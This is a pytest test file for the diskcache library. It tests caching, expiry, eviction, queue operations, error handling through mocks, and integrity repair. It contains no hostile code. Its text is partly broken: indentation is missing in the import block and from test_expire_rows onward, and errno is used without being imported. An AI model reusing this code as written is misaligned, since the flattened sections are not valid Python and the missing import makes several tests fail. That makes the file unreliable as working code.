import functools as ft
import hashlib
import io
import json
import mock
import os
import os.path as op
import pytest
import random
import shutil
import sqlite3
import subprocess as sp
import sys
import tempfile
import threading
import time
import unittest
import warnings
import zlib
try:
import cPickle as pickle
except:
import pickle
import diskcache
import diskcache as dc
pytestmark = pytest.mark.filterwarnings('ignore', category=dc.EmptyDirWarning)
if sys.hexversion < 0x03000000:
range = xrange
@pytest.fixture
def cache():
    """Yield a fresh closed-on-exit Cache; remove its directory afterwards."""
    with dc.Cache() as cache:
        yield cache
    shutil.rmtree(cache.directory, ignore_errors=True)
def test_init(cache):
    """A new cache exposes the default settings and close() is idempotent."""
    for key, value in dc.DEFAULT_SETTINGS.items():
        assert getattr(cache, key) == value
    cache.check()
    # Closing twice must be safe.
    cache.close()
    cache.close()
def test_init_disk():
    """disk_* keyword arguments are forwarded to the Disk and recorded."""
    with dc.Cache(disk_pickle_protocol=1, disk_min_file_size=2 ** 20) as cache:
        key = (None, 0, 'abc')
        cache[key] = 0
        cache.check()
        assert cache.disk_min_file_size == 2 ** 20
        assert cache.disk_pickle_protocol == 1
    shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_reset():
    """reset() on disk_* settings updates both the cache and its Disk."""
    with dc.Cache(disk_min_file_size=0, disk_pickle_protocol=0) as cache:
        value = (None, 0, 'abc')
        cache[0] = value
        cache.check()

        assert cache.disk_min_file_size == 0
        assert cache.disk_pickle_protocol == 0
        assert cache._disk.min_file_size == 0
        assert cache._disk.pickle_protocol == 0

        # Change settings at runtime and verify they propagate to the disk.
        cache.reset('disk_min_file_size', 2 ** 10)
        cache.reset('disk_pickle_protocol', 2)
        cache[1] = value
        cache.check()

        assert cache.disk_min_file_size == 2 ** 10
        assert cache.disk_pickle_protocol == 2
        assert cache._disk.min_file_size == 2 ** 10
        assert cache._disk.pickle_protocol == 2
    shutil.rmtree(cache.directory, ignore_errors=True)
def test_disk_valueerror():
    """Passing a Disk *instance* (not a class) for disk= raises ValueError."""
    with pytest.raises(ValueError):
        with dc.Cache(disk=dc.Disk('test')):
            pass
class JSONDisk(diskcache.Disk):
    """Disk subclass serializing keys and values as zlib-compressed JSON."""

    def __init__(self, directory, compress_level=1, **kwargs):
        # compress_level: zlib level (1 = fastest, 9 = smallest).
        self.compress_level = compress_level
        super(JSONDisk, self).__init__(directory, **kwargs)

    def put(self, key):
        """Serialize and compress the key before storing."""
        json_bytes = json.dumps(key).encode('utf-8')
        data = zlib.compress(json_bytes, self.compress_level)
        return super(JSONDisk, self).put(data)

    def get(self, key, raw):
        """Decompress and deserialize a stored key."""
        data = super(JSONDisk, self).get(key, raw)
        return json.loads(zlib.decompress(data).decode('utf-8'))

    def store(self, value, read, key=dc.UNKNOWN):
        """Serialize and compress the value unless it is file-like (read)."""
        if not read:
            json_bytes = json.dumps(value).encode('utf-8')
            value = zlib.compress(json_bytes, self.compress_level)
        return super(JSONDisk, self).store(value, read, key=key)

    def fetch(self, mode, filename, value, read):
        """Decompress and deserialize a stored value unless file-like."""
        data = super(JSONDisk, self).fetch(mode, filename, value, read)
        if not read:
            data = json.loads(zlib.decompress(data).decode('utf-8'))
        return data
def test_custom_disk():
    """JSON-serializable values round-trip through a custom Disk subclass."""
    with dc.Cache(disk=JSONDisk, disk_compress_level=6) as cache:
        values = [None, True, 0, 1.23, {}, [None] * 10000]

        for value in values:
            cache[value] = value

        for value in values:
            assert cache[value] == value

    shutil.rmtree(cache.directory, ignore_errors=True)
class SHA256FilenameDisk(diskcache.Disk):
    """Disk subclass naming value files by the SHA-256 of the key.

    NOTE(review): assumes keys are bytes (hashlib requires bytes input).
    """

    def filename(self, key=dc.UNKNOWN, value=dc.UNKNOWN):
        # First 32 hex chars of the digest keep filenames short but unique
        # enough for the test's key space.
        filename = hashlib.sha256(key).hexdigest()[:32]
        full_path = op.join(self._directory, filename)
        return filename, full_path
def test_custom_filename_disk():
    """Values are stored at the filename chosen by the custom Disk."""
    with dc.Cache(disk=SHA256FilenameDisk) as cache:
        for count in range(100, 200):
            key = str(count).encode('ascii')
            cache[key] = str(count) * int(1e5)

        # Verify each value landed in the file named by the key's SHA-256.
        for count in range(100, 200):
            key = str(count).encode('ascii')
            filename = hashlib.sha256(key).hexdigest()[:32]
            full_path = op.join(cache.directory, filename)

            with open(full_path) as reader:
                content = reader.read()

            assert content == str(count) * int(1e5)

    shutil.rmtree(cache.directory, ignore_errors=True)
def test_init_makedirs():
    """Directory-creation failures in Cache() propagate as EnvironmentError."""
    # Create then remove a temp dir so Cache() must call os.makedirs itself.
    cache_dir = tempfile.mkdtemp()
    shutil.rmtree(cache_dir)
    makedirs = mock.Mock(side_effect=OSError(errno.EACCES))

    with pytest.raises(EnvironmentError):
        try:
            with mock.patch('os.makedirs', makedirs):
                # Constructor result intentionally discarded; the error is
                # expected during __init__ (previously bound to an unused
                # local).
                dc.Cache(cache_dir)
        except EnvironmentError:
            # Clean up any partially-created directory before re-raising.
            shutil.rmtree(cache_dir, ignore_errors=True)
            raise
def test_pragma_error(cache):
    """A persistently failing PRAGMA eventually raises OperationalError."""
    # Mock the thread-local connection so every PRAGMA read fails; 60000
    # failures exhaust the retry loop (sleep is patched out for speed).
    local = mock.Mock()
    con = mock.Mock()
    execute = mock.Mock()
    cursor = mock.Mock()
    fetchall = mock.Mock()

    local.pid = os.getpid()
    local.con = con
    con.execute = execute
    execute.return_value = cursor
    cursor.fetchall = fetchall
    fetchall.side_effect = [sqlite3.OperationalError] * 60000

    size = 2 ** 28

    with mock.patch('time.sleep', lambda num: 0):
        with mock.patch.object(cache, '_local', local):
            with pytest.raises(sqlite3.OperationalError):
                cache.reset('sqlite_mmap_size', size)
def test_close_error(cache):
    """close() tolerates the thread-local losing its attributes mid-close."""

    class LocalTest(object):
        # First attribute access succeeds (returns a Mock); every later
        # access raises AttributeError, simulating torn-down local state.
        def __init__(self):
            self._calls = 0

        def __getattr__(self, name):
            if self._calls:
                raise AttributeError
            else:
                self._calls += 1
                return mock.Mock()

    with mock.patch.object(cache, '_local', LocalTest()):
        cache.close()
def test_getsetdel(cache):
    """Round-trip set/get/del for many value types, both directions.

    Each tuple is (value, file_like); file-like values are stored with
    read=True and compared against their buffer contents.
    """
    values = [
        (None, False),
        ((None,) * 2 ** 20, False),
        (1234, False),
        (2 ** 512, False),
        (56.78, False),
        (u'hello', False),
        (u'hello' * 2 ** 20, False),
        (b'world', False),
        (b'world' * 2 ** 20, False),
        (io.BytesIO(b'world' * 2 ** 20), True),
    ]

    # Pass 1: values as values, indexes as keys.
    for key, (value, file_like) in enumerate(values):
        assert cache.set(key, value, read=file_like)

    assert len(cache) == len(values)

    for key, (value, file_like) in enumerate(values):
        if file_like:
            assert cache[key] == value.getvalue()
        else:
            assert cache[key] == value

    for key, _ in enumerate(values):
        del cache[key]

    assert len(cache) == 0

    # Pass 2: the same objects used as *keys* instead of values.
    for value, (key, _) in enumerate(values):
        cache[key] = value

    assert len(cache) == len(values)

    for value, (key, _) in enumerate(values):
        assert cache[key] == value

    for _, (key, _) in enumerate(values):
        del cache[key]

    assert len(cache) == 0

    cache.check()
def test_get_keyerror1(cache):
    """Subscript access to a missing key raises KeyError."""
    with pytest.raises(KeyError):
        cache[0]
def test_get_keyerror4(cache):
    """A missing value file (ENOENT) during lookup surfaces as an error."""
    func = mock.Mock(side_effect=IOError(errno.ENOENT, ''))
    cache.reset('statistics', True)
    # Large value forces file-backed storage so the patched open() is used.
    cache[0] = b'abcd' * 2 ** 20

    with mock.patch('diskcache.core.open', func):
        with pytest.raises((IOError, KeyError, OSError)):
            cache[0]
def test_read(cache):
    """read() yields a file handle for a file-backed value."""
    cache.set(0, b'abcd' * 2 ** 20)
    with cache.read(0) as reader:
        assert reader is not None
def test_read_keyerror(cache):
    """read() on a missing key raises KeyError."""
    with pytest.raises(KeyError):
        with cache.read(0) as reader:
            pass
def test_set_twice(cache):
    """Overwriting a key works across inline and file-backed storage."""
    large_value = b'abcd' * 2 ** 20

    cache[0] = 0
    cache[0] = 1

    assert cache[0] == 1

    # Replace the small value with a large (file-backed) one.
    cache[0] = large_value

    assert cache[0] == large_value

    with cache.get(0, read=True) as reader:
        assert reader.name is not None

    # And back to a small inline value again.
    cache[0] = 2

    assert cache[0] == 2
    assert cache.get(0, read=True) == 2

    cache.check()
def test_set_timeout(cache):
    """An OperationalError during set() is reported as a Timeout."""
    # Mock the connection so executing the insert always fails.
    local = mock.Mock()
    con = mock.Mock()
    execute = mock.Mock()

    local.pid = os.getpid()
    local.con = con
    con.execute = execute
    execute.side_effect = sqlite3.OperationalError

    with pytest.raises(dc.Timeout):
        try:
            with mock.patch.object(cache, '_local', local):
                cache.set('a', 'b' * 2 ** 20)
        finally:
            # The cache must remain consistent after the failed write.
            cache.check()
def test_raw(cache):
    """A file-like value stored with read=True is returned as its bytes."""
    assert cache.set(0, io.BytesIO(b'abcd'), read=True)
    assert cache[0] == b'abcd'
def test_get(cache):
    """get() supports defaults plus expire_time/tag metadata flags."""
    assert cache.get(0) is None
    assert cache.get(1, 'dne') == 'dne'
    assert cache.get(2, {}) == {}
    # Missing key with metadata flags returns a tuple of Nones.
    assert cache.get(0, expire_time=True, tag=True) == (None, None, None)

    assert cache.set(0, 0, expire=None, tag=u'number')

    assert cache.get(0, expire_time=True) == (0, None)
    assert cache.get(0, tag=True) == (0, u'number')
    assert cache.get(0, expire_time=True, tag=True) == (0, None, u'number')
def test_get_expired_fast_path(cache):
    """An expired key reads as missing (fast path: no stats, default policy)."""
    assert cache.set(0, 0, expire=0.001)
    time.sleep(0.01)
    assert cache.get(0) is None
def test_get_ioerror_fast_path(cache):
    """ENOENT while fetching a value is treated as a miss (fast path)."""
    assert cache.set(0, 0)

    # Mock the disk so fetch() raises ENOENT (value file vanished).
    disk = mock.Mock()
    put = mock.Mock()
    fetch = mock.Mock()

    disk.put = put
    put.side_effect = [(0, True)]
    disk.fetch = fetch
    io_error = IOError()
    io_error.errno = errno.ENOENT
    fetch.side_effect = io_error

    with mock.patch.object(cache, '_disk', disk):
        assert cache.get(0) is None
def test_get_expired_slow_path(cache):
    """Expired key reads as missing on the slow path (stats + LRU policy)."""
    cache.stats(enable=True)
    cache.reset('eviction_policy', 'least-recently-used')
    assert cache.set(0, 0, expire=0.001)
    time.sleep(0.01)
    assert cache.get(0) is None
def test_get_ioerror_slow_path(cache):
    """Non-ENOENT I/O errors propagate from get() (slow path, LRU policy)."""
    cache.reset('eviction_policy', 'least-recently-used')
    cache.set(0, 0)

    # Mock the disk so fetch() raises EACCES — an error that must NOT be
    # swallowed as a cache miss.
    disk = mock.Mock()
    put = mock.Mock()
    fetch = mock.Mock()

    disk.put = put
    put.side_effect = [(0, True)]
    disk.fetch = fetch
    io_error = IOError()
    io_error.errno = errno.EACCES
    fetch.side_effect = io_error

    with mock.patch.object(cache, '_disk', disk):
        with pytest.raises(IOError):
            cache.get(0)
def test_pop(cache):
    """pop() removes and returns values, with default/metadata variants."""
    assert cache.incr('alpha') == 1
    assert cache.pop('alpha') == 1
    assert cache.get('alpha') is None
    assert cache.check() == []

    assert cache.set('alpha', 123, expire=1, tag='blue')
    assert cache.pop('alpha', tag=True) == (123, 'blue')

    # Expired entries pop as the provided default.
    assert cache.set('beta', 456, expire=1e-9, tag='green')
    time.sleep(0.01)
    assert cache.pop('beta', 'dne') == 'dne'

    assert cache.set('gamma', 789, tag='red')
    assert cache.pop('gamma', expire_time=True, tag=True) == (789, None, 'red')

    assert cache.pop('dne') is None

    assert cache.set('delta', 210)
    assert cache.pop('delta', expire_time=True) == (210, None)

    # File-backed (large) values pop correctly too.
    assert cache.set('epsilon', '0' * 2 ** 20)
    assert cache.pop('epsilon') == '0' * 2 ** 20
def test_pop_ioerror(cache):
    """ENOENT while fetching during pop() is treated as a miss."""
    assert cache.set(0, 0)

    disk = mock.Mock()
    put = mock.Mock()
    fetch = mock.Mock()

    disk.put = put
    put.side_effect = [(0, True)]
    disk.fetch = fetch
    io_error = IOError()
    io_error.errno = errno.ENOENT
    fetch.side_effect = io_error

    with mock.patch.object(cache, '_disk', disk):
        assert cache.pop(0) is None
def test_pop_ioerror_eacces(cache):
    """Non-ENOENT I/O errors propagate from pop()."""
    assert cache.set(0, 0)

    disk = mock.Mock()
    put = mock.Mock()
    fetch = mock.Mock()

    disk.put = put
    put.side_effect = [(0, True)]
    disk.fetch = fetch
    io_error = IOError()
    io_error.errno = errno.EACCES
    fetch.side_effect = io_error

    with mock.patch.object(cache, '_disk', disk):
        with pytest.raises(IOError):
            cache.pop(0)
def test_delete(cache):
    """delete() returns True on removal and False on a missing key."""
    cache[0] = 0
    assert cache.delete(0)
    assert len(cache) == 0
    assert not cache.delete(0)
    assert len(cache.check()) == 0
def test_del(cache):
    """del on a missing key raises KeyError."""
    with pytest.raises(KeyError):
        del cache[0]
def test_del_expired(cache):
    """del on an expired key raises KeyError (expired == missing)."""
    cache.set(0, 0, expire=0.001)
    time.sleep(0.01)
    with pytest.raises(KeyError):
        del cache[0]
def test_stats(cache):
    """stats() counts hits/misses only while enabled, and can reset."""
    cache[0] = 0

    assert cache.stats(enable=True) == (0, 0)

    for _ in range(100):
        cache[0]

    for _ in range(10):
        cache.get(1)

    # 100 hits on key 0, 10 misses on key 1; reset clears the counters.
    assert cache.stats(reset=True) == (100, 10)
    assert cache.stats(enable=False) == (0, 0)

    # With statistics disabled, accesses are not counted.
    for _ in range(100):
        cache[0]

    for _ in range(10):
        cache.get(1)

    assert cache.stats() == (0, 0)
    assert len(cache.check()) == 0
def test_path(cache):
    """Small values have no backing file; large values expose a readable path."""
    cache[0] = u'abc'
    large_value = b'abc' * 2 ** 20
    cache[1] = large_value

    # Inline value: get(read=True) returns the value itself.
    assert cache.get(0, read=True) == u'abc'

    with cache.get(1, read=True) as reader:
        assert reader.name is not None
        path = reader.name

    # The on-disk file content matches the stored value.
    with open(path, 'rb') as reader:
        value = reader.read()

    assert value == large_value

    assert len(cache.check()) == 0
def test_expire_rows(cache):
cache.reset('cull_limit', 0)
for value in range(10):
assert cache.set(value, value, expire=1e-9)
for value in range(10, 15):
assert cache.set(value, value)
assert len(cache) == 15
time.sleep(0.01)
cache.reset('cull_limit', 10)
assert cache.set(15, 15)
assert len(cache) == 6
assert len(cache.check()) == 0
def test_least_recently_stored(cache):
cache.reset('eviction_policy', u'least-recently-stored')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 2)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
for value in range(10):
assert cache[value] == million
for value in range(10, 20):
cache[value] = million
assert len(cache) == 10
for value in range(10):
cache[value] = million
count = len(cache)
for index, length in enumerate([1, 2, 3, 4]):
cache[10 + index] = million * length
assert len(cache) == count - length
assert cache[12] == million * 3
assert cache[13] == million * 4
assert len(cache.check()) == 0
def test_least_recently_used(cache):
cache.reset('eviction_policy', u'least-recently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
time.sleep(0.01)
cache[0]
cache[1]
cache[7]
cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_least_frequently_used(cache):
cache.reset('eviction_policy', u'least-frequently-used')
cache.reset('size_limit', int(10.1e6))
cache.reset('cull_limit', 5)
million = b'x' * int(1e6)
for value in range(10):
cache[value] = million
assert len(cache) == 10
cache[0], cache[0], cache[0], cache[0], cache[0]
cache[1], cache[1], cache[1], cache[1]
cache[7], cache[7], cache[7]
cache[8], cache[8]
cache[9]
cache[10] = million
assert len(cache) == 6
for value in [0, 1, 7, 8, 9, 10]:
assert cache[value] == million
assert len(cache.check()) == 0
def test_filename_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
with mock.patch('os.makedirs', func):
with pytest.raises(OSError):
cache._disk.filename()
def test_remove_error(cache):
func = mock.Mock(side_effect=OSError(errno.EACCES))
try:
with mock.patch('os.remove', func):
cache._disk.remove('ab/cd/efg.val')
except OSError:
pass
else:
if os.name == 'nt':
pass # File delete errors ignored on Windows.
else:
raise Exception('test_remove_error failed')
def test_check(cache):
blob = b'a' * 2 ** 20
keys = (0, 1, 1234, 56.78, u'hello', b'world', None)
for key in keys:
cache[key] = blob
# Cause mayhem.
with cache.get(0, read=True) as reader:
full_path = reader.name
os.rename(full_path, full_path + '_moved')
with cache.get(1, read=True) as reader:
full_path = reader.name
os.remove(full_path)
cache._sql('UPDATE Cache SET size = 0 WHERE rowid > 1')
cache.reset('count', 0)
cache.reset('size', 0)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0 # Should display no warnings.
def test_integrity_check(cache):
for value in range(1000):
cache[value] = value
cache.close()
with io.open(op.join(cache.directory, 'cache.db'), 'r+b') as writer:
writer.seek(52)
writer.write(b'\x00\x01') # Should be 0, change it.
cache = dc.Cache(cache.directory)
with warnings.catch_warnings():
warnings.filterwarnings('ignore')
cache.check()
cache.check(fix=True)
assert len(cache.check()) == 0
def test_expire(cache):
cache.reset('cull_limit', 0) # Disable expiring keys on `set`.
now = time.time()
time_time = mock.Mock(return_value=now)
with mock.patch('time.time', time_time):
for value in range(1, 101):
assert cache.set(value, value, expire=value)
assert len(cache) == 100
time_time = mock.Mock(return_value=now + 11)
cache.reset('cull_limit', 10)
with mock.patch('time.time', time_time):
assert cache.expire() == 10
assert len(cache) == 90
assert len(cache.check()) == 0
def test_tag_index():
with dc.Cache(tag_index=True) as cache:
assert cache.tag_index == 1
shutil.rmtree(cache.directory, ignore_errors=True)
def test_evict(cache):
colors = ('red', 'blue', 'yellow')
for value in range(90):
assert cache.set(value, value, tag=colors[value % len(colors)])
assert len(cache) == 90
assert cache.evict('red') == 30
assert len(cache) == 60
assert len(cache.check()) == 0
def test_clear(cache):
for value in range(100):
cache[value] = value
assert len(cache) == 100
assert cache.clear() == 100
assert len(cache) == 0
assert len(cache.check()) == 0
def test_clear_timeout(cache):
transact = mock.Mock()
transact.side_effect = dc.Timeout
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.clear()
def test_tag(cache):
assert cache.set(0, None, tag=u'zero')
assert cache.set(1, None, tag=1234)
assert cache.set(2, None, tag=5.67)
assert cache.set(3, None, tag=b'three')
assert cache.get(0, tag=True) == (None, u'zero')
assert cache.get(1, tag=True) == (None, 1234)
assert cache.get(2, tag=True) == (None, 5.67)
assert cache.get(3, tag=True) == (None, b'three')
def test_with(cache):
with dc.Cache(cache.directory) as tmp:
tmp[u'a'] = 0
tmp[u'b'] = 1
assert cache[u'a'] == 0
assert cache[u'b'] == 1
def test_contains(cache):
assert 0 not in cache
cache[0] = 0
assert 0 in cache
def test_touch(cache):
assert cache.set(0, None, expire=60)
assert cache.touch(0, expire=None)
assert cache.touch(0, expire=0)
assert not cache.touch(0)
def test_add(cache):
assert cache.add(1, 1)
assert cache.get(1) == 1
assert not cache.add(1, 2)
assert cache.get(1) == 1
assert cache.delete(1)
assert cache.add(1, 1, expire=0.001)
time.sleep(0.01)
assert cache.add(1, 1)
cache.check()
def test_add_large_value(cache):
value = b'abcd' * 2 ** 20
assert cache.add(b'test-key', value)
assert cache.get(b'test-key') == value
assert not cache.add(b'test-key', value * 2)
assert cache.get(b'test-key') == value
cache.check()
def test_add_timeout(cache):
local = mock.Mock()
con = mock.Mock()
execute = mock.Mock()
local.pid = os.getpid()
local.con = con
con.execute = execute
execute.side_effect = sqlite3.OperationalError
with pytest.raises(dc.Timeout):
try:
with mock.patch.object(cache, '_local', local):
cache.add(0, 0)
finally:
cache.check()
def test_incr(cache):
assert cache.incr('key', default=5) == 6
assert cache.incr('key', 2) == 8
assert cache.get('key', expire_time=True, tag=True) == (8, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.incr('key') == 1
def test_incr_insert_keyerror(cache):
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_incr_update_keyerror(cache):
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
with pytest.raises(KeyError):
cache.incr('key', default=None)
def test_decr(cache):
assert cache.decr('key', default=5) == 4
assert cache.decr('key', 2) == 2
assert cache.get('key', expire_time=True, tag=True) == (2, None, None)
assert cache.delete('key')
assert cache.set('key', 100, expire=0.100)
assert cache.get('key') == 100
time.sleep(0.120)
assert cache.decr('key') == -1
def test_iter(cache):
sequence = list('abcdef') + [('g',)]
for index, value in enumerate(sequence):
cache[value] = index
iterator = iter(cache)
assert all(one == two for one, two in zip(sequence, iterator))
cache['h'] = 7
with pytest.raises(StopIteration):
next(iterator)
def test_iter_expire(cache):
cache.reset('cull_limit', 0)
for num in range(100):
cache.set(num, num, expire=1e-9)
assert len(cache) == 100
assert list(cache) == list(range(100))
def test_iter_error(cache):
with pytest.raises(StopIteration):
next(iter(cache))
def test_reversed(cache):
sequence = 'abcdef'
for index, value in enumerate(sequence):
cache[value] = index
iterator = reversed(cache)
pairs = zip(reversed(sequence), iterator)
assert all(one == two for one, two in pairs)
try:
next(iterator)
except StopIteration:
pass
else:
assert False, 'StopIteration expected'
def test_reversed_error(cache):
with pytest.raises(StopIteration):
next(reversed(cache))
def test_push_pull(cache):
for value in range(10):
cache.push(value)
for value in range(10):
_, pull_value = cache.pull()
assert pull_value == value
assert len(cache) == 0
def test_push_pull_prefix(cache):
for value in range(10):
cache.push(value, prefix='key')
for value in range(10):
key, peek_value = cache.peek(prefix='key')
key, pull_value = cache.pull(prefix='key')
assert key.startswith('key')
assert peek_value == value
assert pull_value == value
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_pull_extras(cache):
cache.push('test')
assert cache.pull() == (500000000000000, 'test')
assert len(cache) == 0
cache.push('test', expire=10)
(key, value), expire_time = cache.peek(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 1
(key, value), expire_time = cache.pull(expire_time=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time > time.time()
assert len(cache) == 0
cache.push('test', tag='foo')
(key, value), tag = cache.peek(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 1
(key, value), tag = cache.pull(tag=True)
assert key == 500000000000000
assert value == 'test'
assert tag == 'foo'
assert len(cache) == 0
cache.push('test')
(key, value), expire_time, tag = cache.peek(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 1
(key, value), expire_time, tag = cache.pull(expire_time=True, tag=True)
assert key == 500000000000000
assert value == 'test'
assert expire_time is None
assert tag is None
assert len(cache) == 0
assert cache.pull(default=(0, 1)) == (0, 1)
assert len(cache.check()) == 0
def test_push_pull_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.pull() == (500000000000003, 1)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_expire(cache):
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(0, expire=0.1)
cache.push(1)
time.sleep(0.2)
assert cache.peek() == (500000000000003, 1)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_push_pull_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.pull() == (500000000000000, value)
assert len(cache) == 0
assert len(cache.check()) == 0
def test_push_peek_large_value(cache):
value = b'test' * (2 ** 20)
cache.push(value)
assert cache.peek() == (500000000000000, value)
assert len(cache) == 1
assert len(cache.check()) == 0
def test_pull_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
assert cache.pull() == (None, None)
def test_peek_ioerror(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 0]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peek()
assert value == 0
def test_pull_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.pull()
def test_peek_ioerror_eacces(cache):
assert cache.push(0) == 500000000000000
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peek()
def test_peekitem_extras(cache):
with pytest.raises(KeyError):
cache.peekitem()
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2, expire=10, tag='foo')
assert cache.set('d', 3, expire=0.1)
assert cache.set('e', 4, expire=0.1)
time.sleep(0.2)
(key, value), expire_time, tag = cache.peekitem(expire_time=True, tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
(key, value), expire_time = cache.peekitem(expire_time=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
(key, value), tag = cache.peekitem(tag=True)
assert key == 'c'
assert value == 2
assert expire_time > 0
assert tag == 'foo'
def test_peekitem_ioerror(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.ENOENT
fetch.side_effect = [io_error, 2]
with mock.patch.object(cache, '_disk', disk):
_, value = cache.peekitem()
assert value == 2
def test_peekitem_ioerror_eacces(cache):
assert cache.set('a', 0)
assert cache.set('b', 1)
assert cache.set('c', 2)
disk = mock.Mock()
put = mock.Mock()
fetch = mock.Mock()
disk.put = put
put.side_effect = [(0, True)]
disk.fetch = fetch
io_error = IOError()
io_error.errno = errno.EACCES
fetch.side_effect = io_error
with mock.patch.object(cache, '_disk', disk):
with pytest.raises(IOError):
cache.peekitem()
def test_iterkeys(cache):
assert list(cache.iterkeys()) == []
def test_pickle(cache):
for num, val in enumerate('abcde'):
cache[val] = num
data = pickle.dumps(cache)
other = pickle.loads(data)
for key in other:
assert other[key] == cache[key]
def test_pragmas(cache):
results = []
def compare_pragmas():
valid = True
for key, value in dc.DEFAULT_SETTINGS.items():
if not key.startswith('sqlite_'):
continue
pragma = key[7:]
result = cache._sql('PRAGMA %s' % pragma).fetchall()
if result == [(value,)]:
continue
args = pragma, result, [(value,)]
print('pragma %s mismatch: %r != %r' % args)
valid = False
results.append(valid)
threads = []
for count in range(8):
thread = threading.Thread(target=compare_pragmas)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert all(results)
def test_size_limit_with_files(cache):
cache.reset('cull_limit', 0)
size_limit = 30 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'foo' * cache.disk_min_file_size
for key in range(40):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_size_limit_with_database(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_eviction_policy_none(cache):
cache.reset('eviction_policy', 'none')
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', size_limit)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() > size_limit
def test_cull_size_limit_0(cache):
cache.reset('cull_limit', 0)
size_limit = 2 * cache.disk_min_file_size
cache.reset('size_limit', 0)
value = b'0123456789' * 10
count = size_limit // (8 + len(value))
for key in range(count):
cache.set(key, value)
assert cache.volume() > size_limit
cache.cull()
assert cache.volume() <= size_limit
def test_cull_timeout(cache):
transact = mock.Mock()
transact.side_effect = [dc.Timeout]
with mock.patch.object(cache, 'expire', lambda now: 0):
with mock.patch.object(cache, 'volume', lambda: int(1e12)):
with mock.patch.object(cache, '_transact', transact):
with pytest.raises(dc.Timeout):
cache.cull()
def test_key_roundtrip(cache):
key_part_0 = u"part0"
key_part_1 = u"part1"
to_test = [
(key_part_0, key_part_1),
[key_part_0, key_part_1],
]
for key in to_test:
cache.clear()
cache[key] = {'example0': ['value0']}
keys = list(cache)
assert len(keys) == 1
cache_key = keys[0]
assert cache[key] == {'example0': ['value0']}
assert cache[cache_key] == {'example0': ['value0']}
def test_constant():
import diskcache.core
assert repr(diskcache.core.ENOVAL) == 'ENOVAL'
def test_copy():
cache_dir1 = tempfile.mkdtemp()
with dc.Cache(cache_dir1) as cache1:
for count in range(10):
cache1[count] = str(count)
for count in range(10, 20):
cache1[count] = str(count) * int(1e5)
cache_dir2 = tempfile.mkdtemp()
shutil.rmtree(cache_dir2)
shutil.copytree(cache_dir1, cache_dir2)
with dc.Cache(cache_dir2) as cache2:
for count in range(10):
assert cache2[count] == str(count)
for count in range(10, 20):
assert cache2[count] == str(count) * int(1e5)
shutil.rmtree(cache_dir1, ignore_errors=True)
